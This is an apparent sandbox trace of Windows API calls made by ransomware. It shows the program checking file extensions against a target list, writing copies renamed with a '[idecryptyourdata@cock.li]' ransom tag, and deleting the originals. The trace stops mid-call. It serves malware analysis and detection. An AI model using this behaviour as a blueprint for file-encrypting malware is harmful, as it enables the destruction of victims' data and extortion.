[0183.891] lstrlenW (lpString="VGX.dll") returned 7 [0183.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0183.892] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=987136) returned 1 [0183.892] CloseHandle (hObject=0x374) returned 1 [0183.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll")) returned 0x20 [0183.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0183.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.892] lstrlenW (lpString=".doc") returned 4 [0183.892] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0183.892] lstrlenW (lpString=".docx") returned 5 [0183.892] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0183.892] lstrlenW (lpString=".pdf") returned 4 [0183.892] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0183.893] lstrlenW (lpString=".xls") returned 4 [0183.893] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0183.893] lstrlenW (lpString=".xlsx") returned 5 [0183.893] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0183.893] lstrlenW (lpString=".ppt") returned 4 [0183.893] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0183.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.893] lstrlenW (lpString=".zip") returned 4 [0183.893] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0183.893] lstrlenW (lpString=".rar") returned 4 [0183.893] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0183.893] lstrlenW (lpString=".bz2") returned 4 [0183.893] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0183.893] lstrlenW (lpString=".7z") returned 3 [0183.893] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0183.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.893] lstrlenW (lpString=".dbf") returned 4 [0183.893] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0183.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.893] lstrlenW (lpString=".1cd") returned 4 [0183.893] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0183.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.893] lstrlenW (lpString=".jpg") returned 4 [0183.893] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0183.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.893] lstrlenW (lpString=".doc") returned 4 [0183.893] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0183.894] lstrlenW (lpString=".docx") returned 5 [0183.894] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0183.894] lstrlenW (lpString=".pdf") returned 4 [0183.894] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0183.894] lstrlenW (lpString=".xls") returned 4 [0183.894] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0183.894] lstrlenW (lpString=".xlsx") returned 5 [0183.894] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0183.894] lstrlenW (lpString=".ppt") returned 4 [0183.894] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0183.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.894] lstrlenW (lpString=".zip") returned 4 [0183.894] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0183.894] lstrlenW (lpString=".rar") returned 4 [0183.894] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0183.894] lstrlenW (lpString=".bz2") returned 4 [0183.894] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0183.894] lstrlenW (lpString=".7z") returned 3 [0183.894] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0183.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.894] lstrlenW (lpString=".dbf") returned 4 [0183.894] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0183.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.894] lstrlenW (lpString=".1cd") returned 4 [0183.894] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0183.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 58 [0183.894] lstrlenW (lpString=".jpg") returned 4 [0183.894] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0183.895] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0183.895] lstrlenW (lpString="VSTOInstallerUI.dll") returned 19 [0183.895] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0183.897] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=12448) returned 1 [0183.897] CloseHandle (hObject=0x374) returned 1 [0183.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll")) returned 0x20 [0183.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0183.897] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.897] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0184.004] GetLastError () returned 0x0 [0184.004] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x30a0, lpOverlapped=0x0) returned 1 [0184.093] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x30b0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x30b0, lpOverlapped=0x0) returned 1 [0184.094] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.094] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xfa, lpOverlapped=0x0) returned 1 [0184.094] SetEndOfFile (hFile=0x398) returned 1 [0184.095] CloseHandle (hObject=0x398) returned 1 [0184.095] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.095] SetEndOfFile (hFile=0x374) returned 1 [0184.096] CloseHandle (hObject=0x374) returned 1 [0184.096] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.096] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll")) returned 1 [0184.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.097] lstrlenW (lpString=".doc") returned 4 [0184.097] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.097] lstrlenW (lpString=".docx") returned 5 [0184.097] lstrcmpiW (lpString1=".docx", lpString2="I.dll") returned -1 [0184.097] lstrlenW (lpString=".pdf") returned 4 [0184.097] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.097] lstrlenW (lpString=".xls") returned 4 [0184.097] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.097] lstrlenW (lpString=".xlsx") returned 5 [0184.097] lstrcmpiW (lpString1=".xlsx", lpString2="I.dll") returned -1 [0184.097] lstrlenW (lpString=".ppt") returned 4 [0184.097] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.097] lstrlenW (lpString=".zip") returned 4 [0184.097] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.097] lstrlenW (lpString=".rar") returned 4 [0184.097] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.097] lstrlenW (lpString=".bz2") returned 4 [0184.097] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.097] lstrlenW (lpString=".7z") returned 3 [0184.097] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.097] lstrlenW (lpString=".dbf") returned 4 [0184.097] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.098] lstrlenW (lpString=".1cd") returned 4 [0184.098] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.098] lstrlenW (lpString=".jpg") returned 4 [0184.098] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.098] lstrlenW (lpString=".doc") returned 4 [0184.098] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.098] lstrlenW (lpString=".docx") returned 5 [0184.098] lstrcmpiW (lpString1=".docx", lpString2="I.dll") returned -1 [0184.098] lstrlenW (lpString=".pdf") returned 4 [0184.098] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.098] lstrlenW (lpString=".xls") returned 4 [0184.098] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.098] lstrlenW (lpString=".xlsx") returned 5 [0184.098] lstrcmpiW (lpString1=".xlsx", lpString2="I.dll") returned -1 [0184.098] lstrlenW (lpString=".ppt") returned 4 [0184.098] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.098] lstrlenW (lpString=".zip") returned 4 [0184.098] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.098] lstrlenW (lpString=".rar") returned 4 [0184.098] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.098] lstrlenW (lpString=".bz2") returned 4 [0184.098] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.098] lstrlenW (lpString=".7z") returned 3 [0184.099] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.099] lstrlenW (lpString=".dbf") returned 4 [0184.099] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.099] lstrlenW (lpString=".1cd") returned 4 [0184.099] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 81 [0184.099] lstrlenW (lpString=".jpg") returned 4 [0184.099] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.099] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.099] lstrlenW (lpString="VSTOLoaderUI.dll") returned 16 [0184.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.100] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=20608) returned 1 [0184.100] CloseHandle (hObject=0x374) returned 1 [0184.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll")) returned 0x20 [0184.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.100] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.100] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0184.101] GetLastError () returned 0x0 [0184.101] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x5080, lpOverlapped=0x0) returned 1 [0184.210] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x5090, lpOverlapped=0x0) returned 1 [0184.212] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.212] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xf4, lpOverlapped=0x0) returned 1 [0184.212] SetEndOfFile (hFile=0x398) returned 1 [0184.212] CloseHandle (hObject=0x398) returned 1 [0184.213] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.213] SetEndOfFile (hFile=0x374) returned 1 [0184.214] CloseHandle (hObject=0x374) returned 1 [0184.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.214] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll")) returned 1 [0184.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.215] lstrlenW (lpString=".doc") returned 4 [0184.215] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.215] lstrlenW (lpString=".docx") returned 5 [0184.215] lstrcmpiW (lpString1=".docx", lpString2="I.dll") returned -1 [0184.215] lstrlenW (lpString=".pdf") returned 4 [0184.215] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.215] lstrlenW (lpString=".xls") returned 4 [0184.215] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.215] lstrlenW (lpString=".xlsx") returned 5 [0184.215] lstrcmpiW (lpString1=".xlsx", lpString2="I.dll") returned -1 [0184.215] lstrlenW (lpString=".ppt") returned 4 [0184.215] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.215] lstrlenW (lpString=".zip") returned 4 [0184.215] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.215] lstrlenW (lpString=".rar") returned 4 [0184.215] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.215] lstrlenW (lpString=".bz2") returned 4 [0184.215] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.215] lstrlenW (lpString=".7z") returned 3 [0184.215] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.215] lstrlenW (lpString=".dbf") returned 4 [0184.215] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.216] lstrlenW (lpString=".1cd") returned 4 [0184.216] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.216] lstrlenW (lpString=".jpg") returned 4 [0184.216] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.216] lstrlenW (lpString=".doc") returned 4 [0184.216] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.216] lstrlenW (lpString=".docx") returned 5 [0184.216] lstrcmpiW (lpString1=".docx", lpString2="I.dll") returned -1 [0184.216] lstrlenW (lpString=".pdf") returned 4 [0184.216] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.216] lstrlenW (lpString=".xls") returned 4 [0184.216] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.216] lstrlenW (lpString=".xlsx") returned 5 [0184.216] lstrcmpiW (lpString1=".xlsx", lpString2="I.dll") returned -1 [0184.216] lstrlenW (lpString=".ppt") returned 4 [0184.216] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.216] lstrlenW (lpString=".zip") returned 4 [0184.216] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.216] lstrlenW (lpString=".rar") returned 4 [0184.216] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.216] lstrlenW (lpString=".bz2") returned 4 [0184.216] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.216] lstrlenW (lpString=".7z") returned 3 [0184.217] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.217] lstrlenW (lpString=".dbf") returned 4 [0184.217] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.217] lstrlenW (lpString=".1cd") returned 4 [0184.217] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 78 [0184.217] lstrlenW (lpString=".jpg") returned 4 [0184.217] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.218] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0184.218] lstrlenW (lpString="VSTOInstaller.exe") returned 17 [0184.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.218] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=100488) returned 1 [0184.218] CloseHandle (hObject=0x374) returned 1 [0184.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe")) returned 0x20 [0184.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0184.219] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.219] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0184.219] GetLastError () returned 0x0 [0184.219] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x18888, lpOverlapped=0x0) returned 1 [0184.864] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x18890, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x18890, lpOverlapped=0x0) returned 1 [0184.866] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.866] WriteFile (in: hFile=0x398, 